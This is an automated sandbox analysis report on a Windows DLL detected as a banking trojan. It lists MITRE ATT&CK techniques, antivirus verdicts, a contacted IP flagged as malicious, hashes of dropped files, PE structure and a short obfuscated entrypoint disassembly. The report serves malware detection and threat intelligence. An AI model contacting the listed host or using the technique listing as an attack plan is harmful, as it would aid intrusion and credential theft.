1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
50% | ReversingLabs | Win32.Trojan.Jaik | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620327 |
Start date and time: 04/05/202216:18:26 | 2022-05-04 16:18:26 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | qOfIxt1fnQ.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@24/18@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6492 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: qOfIxt1fnQ.dll
Time | Type | Description |
---|---|---|
16:19:47 | API Interceptor | |
16:20:22 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.0228017303072 |
Encrypted: | false |
SSDEEP: | 24:He6m9Z3Kqj2ZH5hKdNwI+ycuZhNRakSfPNnq9Sd:+t3p2ZnKdm1ulRa39q9C |
MD5: | 374A48CBB719CF1410CFC123BA85C56A |
SHA1: | A453C8195F0E9BCE608CE693314522BBB5DB7357 |
SHA-256: | 5EE33E1AB6193CE0E93EBC0508F9E4D180B514161461C46CDE55DEA2763D0056 |
SHA-512: | 3CA404BB447C645FFA4D9A96FB9E998AF080AC61C1EC822BA16FEB63C9F050BDD639571D29447172BB0DFA58AA0CF85923DCAF31D6FA821CF5CB8476C9708E20 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1336 |
Entropy (8bit): | 4.018016439631709 |
Encrypted: | false |
SSDEEP: | 24:HMm9wWWCuZHGhKdNwI+ycuZhNnakS5PNnq9Sd:6WGZcKdm1ulna37q9C |
MD5: | 998CB2AA26F5148ED793C167B720065C |
SHA1: | 6F981E6A61E9835657168C2B9F888A227B088529 |
SHA-256: | C9668C58126A7953DDB247E53136FBA46312DA3D43C4985FD397319FE9F4BEAB |
SHA-512: | B034CECB30EEC21DE7B53267608ED335EAC5AFAB175483700CB58173AD91C289FEC69DDCCAB3163A19982C41FF578DEECEF53EF49FFB459DCE18D12F9DE2C74A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1002021419389396 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryycak7Ynqq/xPN5Dlq5J:+RI+ycuZhNnakS5PNnqX |
MD5: | 31851C22560D8CF705F72343CE5E3164 |
SHA1: | E18F381430AB4E8688785356BFF7156A34422D7A |
SHA-256: | 21B5FF2331CB7C23694B56EA18671FD81201849885EA382314949585037537B9 |
SHA-512: | A8AE5DFE25991325A0CB66392C6BBB73323C8D775A303F921C1EB654A56998E8824AD3EA27C3C6E87F95312E32EE8171DD960792D6A311B9AB0D8D7CF1AF24D1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.251122514567512 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fuc0zxs7+AEszIcNwi23fui:p37Lvkmb6KwZWnWZEJZWi |
MD5: | 6BEAEAA18A18F11A3948D63B1B3F8C32 |
SHA1: | 3312A982933EE78A9E885480F4C1F9CBE66E22D7 |
SHA-256: | 9107AF0B8A89D0B05BDF59FB9D6F00EB02E082FAC24EFD0580E14863F1B3EF93 |
SHA-512: | B5D5736B9817D960A4573EC38DCFD0A832B5327C01A513A66F5AD60DA4A7271FC2C897AF2AFC2DD6E5A216C37414761E7643602EEDA2AFC427D4025FC687DC7C |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.591873569693151 |
Encrypted: | false |
SSDEEP: | 24:etGSV/u2Bg85z7xlfwZD6ngdWqtkZfJkfWI+ycuZhNnakS5PNnq:6oYb5hFCD6KWdJJr1ulna37q |
MD5: | 0F3C2AD5E4964A882F96D41B812C6B51 |
SHA1: | F8344BE921A55E2FCDEDFEEBB411884370AD183B |
SHA-256: | 46C531D304718E747B3C85947F1C9E593784062451F25109A64B3E61FEA940DA |
SHA-512: | 8551F10E18E0A2477BE548C9C5A2D268DE9B8F15472E8FFD2E2849AA0E540CEA89EA34065423971DB8276D7AE24EC0E6E163F09E4B313EE49EAF758AD00B9CA0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.33360462315722 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KgWUEvWbKaM5DqBVKVrdFAMBJTH:Akka67WUEvWbKxDcVKdBJj |
MD5: | F26BA411CDAFAC953F6F662958CFA7FC |
SHA1: | 50253F14979B6BDCFE5775B660B7D86638A5BC0E |
SHA-256: | 712F6E5FE66B20D71FC2775C76EEDFEFD1BF2D6741815732A5BF81842FA5C8ED |
SHA-512: | 5BAA4E0DDE38F9E4F8F8D03822AC864034770BD30677462186E58E9AF3D42ED3E8523B3E9637A9E45DBE68D0BDAFBC76C86911F46E05CA649980AF0221C67C61 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1047026516417726 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyOak7Ynqq3PPN5Dlq5J:+RI+ycuZhNRakSfPNnqX |
MD5: | 5AD386D1E925F39E50DD975A24323CE0 |
SHA1: | B7CE53658A46267327E53DC30B32D71CB99B6F55 |
SHA-256: | 81B59EFCF69B41434BE6EDCF3EA113398252BC5CECD0A2F25BBFCB788C5A17A9 |
SHA-512: | 103F6FFB76816E098AAAEF6EA8DA5CB77E931C0E91286688CE668C8DBBCBFB8C22E1658E9EE572878441F9B3E969F0F97DA6AA3C75091197F15C8A13FFF7C55C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 377 |
Entropy (8bit): | 5.210292708919398 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fPKZE/0zxs7+AEszIcNwi23fPKZEuA:p37Lvkmb6KwZ3KZEcWZEJZ3KZEuA |
MD5: | 2DBC44A207EDD752053B85C10F469D6C |
SHA1: | F8E49A5B48F33427CC7D5307413F20A65FDBB92C |
SHA-256: | 6CB42564BF4BFDA3F40F18736F0B99707C5ACCFF82C3DF99F993D8100AFDDD95 |
SHA-512: | 8981DDC8840D1A9A1F203348C1AADD611F029ED76CCCB5160CD2FED4A5E15F8CB8AD7C9502C3C48AC6B740EFF7F211B511FC8AC4E5FE33E269D971E23BFCB320 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6169766452209187 |
Encrypted: | false |
SSDEEP: | 24:etGSE8OmU0t3lm85xWAseO4zSQ64pfUPtkZfL78xVUWI+ycuZhNRakSfPNnq:6+XQ3r5xNONQfUuJL78v31ulRa39q |
MD5: | 201BF92233A7B7012A72D095C3394705 |
SHA1: | 57D40D95DF82DB178AF86679A10E875F2BDAFA14 |
SHA-256: | FAAC47DDB1D3AAF6556F8432A6A4E7A42C5392768A0323A4671235D555010F07 |
SHA-512: | 7ED9272880C05FE32E25A41545F9944C9395BFD0FD9EF841508DFA57ABA4056F69D9D2F5163721E888DDE952A5172BCD631632432CBBCE78C3E113AA2BABF994 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 874 |
Entropy (8bit): | 5.316339111104929 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6Kg3K6NEv3K6u1KaM5DqBVKVrdFAMBJTH:Akka673vEv3CKxDcVKdBJj |
MD5: | 0172659AE1F94669437848B8E4F71542 |
SHA1: | 74189A803FB26C1CCF4C311069061690ED4685B4 |
SHA-256: | F2CBA3B681173F5EE1BDB68573D47FAD179D77177C5C5E442C32026D7A90CB45 |
SHA-512: | F8D24E7054A20979DB289F915DB18789E6821C8A81AB8F2C85BF6B49486BE708C00FF033B50FB9678A9E62C985DD120037B910DE81F8E3D20F2BEEF416B6BBE0 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.210979.BCECBztA.20220504162021.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1363 |
Entropy (8bit): | 5.433411541663804 |
Encrypted: | false |
SSDEEP: | 24:BxSAjCdZOvBdaD0x2DOXUWZnIKLCH0n4qWBHjeTKKjX4CIym1ZJXmnIKLCH0n4V1:BZdv6D0oOFu0n4tBqDYB1Zyu0n4rZZLH |
MD5: | 040FF5A0122C60CC82173288B5940EC1 |
SHA1: | E79E7D8569BDEF39A4F50B144092203F9B3B5F90 |
SHA-256: | 4F50423AB8053BF88FFC57F97BBEF47F0AAB312ECB16BF9BD093D7BE08D54E63 |
SHA-512: | 1F6BC1B9F40103B62B6F9AE379EA5660E3D62BAF5DFB5BA19E606CB0D8F2ED084525881DCDFEA5E2461F826D19B3FC3E54B72F56F4C7253575476041486D87F8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | modified |
Size (bytes): | 218 |
Entropy (8bit): | 5.411852919034256 |
Encrypted: | false |
SSDEEP: | 6:QHkQg1sQXgKf+LgyKBM34H6s83F1tu4r9iyeqmM:QEQSsQXNmLgyaI4HmA4cyeHM |
MD5: | 2868C522991E82B72977CDC6EE833E68 |
SHA1: | 87C92831FDCB279D76109D2D00D9BC50614A3F0C |
SHA-256: | 11CBCC12484EE382F33437D9BE237EDE88C7A6ADFCDC37A77C6A1470F6BDFDE9 |
SHA-512: | 852389C501957E3663D757BCCD181F188D7D6B1CBB9426A6007F1A7BED2AEFD9CB3B224886EABEF9CB0FB64C57795E82511CEDC5678EED1BE4F6343B44029CE9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 838 |
Entropy (8bit): | 3.073236880282747 |
Encrypted: | false |
SSDEEP: | 12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB |
MD5: | CA1C201059C5BFD5900F5EB2466883CC |
SHA1: | BF3670A8C06A4FABC5C410F368E178B353F9166C |
SHA-256: | E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085 |
SHA-512: | 2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.23867837523732 |
TrID: |
|
File name: | qOfIxt1fnQ.dll |
File size: | 442368 |
MD5: | 00d3b863abdafc62d9b49f99aec5955c |
SHA1: | 79d75aa72072ddd75a12e849d27b20cc903b9b01 |
SHA256: | 5298257931fb4fcb64bd0e0ba48a2f1f4f1b501813b27d2aabd82056a4feb957 |
SHA512: | 7ba392ed7b747e7818f949cd65764a52a6c2bd39eb1434f2400c5945a926267484260bd970ca212a375bf3b6cb1ee596eb9ae97ac6e93a4af4ad4354ada86c43 |
SSDEEP: | 6144:ripWDNyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:ripGFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | C194F14A77A11DBBEC0807760CF8C51B9B66BE2CA23A70DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Instruction |
---|
push ebp |
mov ebp, esp |
add ecx, FFFFFFFFh |
call 00007F7998A2F1CCh |
pop eax |
pop eax |
mov dword ptr [00414544h], eax |
mov edx, dword ptr [00414660h] |
sub edx, 00005289h |
call edx |
ret |
int3 |
push esi |
mov eax, ebx |
mov dword ptr [00414540h], eax |
pop dword ptr [00414538h] |
mov dword ptr [00414548h], ebp |
mov dword ptr [0041453Ch], edi |
sub dword ptr [00414548h], FFFFFFFCh |
loop 00007F7998A2F175h |
mov dword ptr [ebp+00h], eax |
nop |
mov al, 3Eh |
mov esp, C49C9141h |
xlatb |
jnc 00007F7998A2F182h |
int3 |
mov dword ptr [88C777ACh], eax |
adc ebp, ecx |
test eax, F6469A2Fh |
jnl 00007F7998A2F142h |
adc byte ptr [ebp-69h], cl |
les edx, fword ptr [eax+36h] |
adc cl, byte ptr [edx+0Ah] |
pop edi |
fisub dword ptr [ecx+eax*4+32h] |
inc ebx |
lahf |
add dword ptr [edi-4BCE0FACh], 7BDB895Ah |
dec ebx |
or dword ptr [esi+ebp+4246B7E3h], 0068870Ah |
mov ch, 0Eh |
les edx, fword ptr [ecx+63D22AEBh] |
das |
test al, 8Ah |
add dh, al |
jne 00007F7998A2F1E4h |
movsb |
lds ecx, fword ptr [ebp-38470ACFh] |
in eax, 73h |
and ecx, dword ptr [ebx+eax*4] |
mov ebx, 43A1EE02h |
push FFFFFFDEh |
sbb ebx, dword ptr [ecx] |
push ds |
ffree st(7) |
adc eax, 908E1006h |
call far fword ptr [ebx+33h] |
clc |
adc al, CBh |
pop edi |
mov ch, 82h |
pushad |
adc byte ptr [ebp+0007CE9Ch], dh |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0736897786458 | data | 1.02254153445 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180541992188 | data | 3.71518095672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373819986979 | data | 6.02838684246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
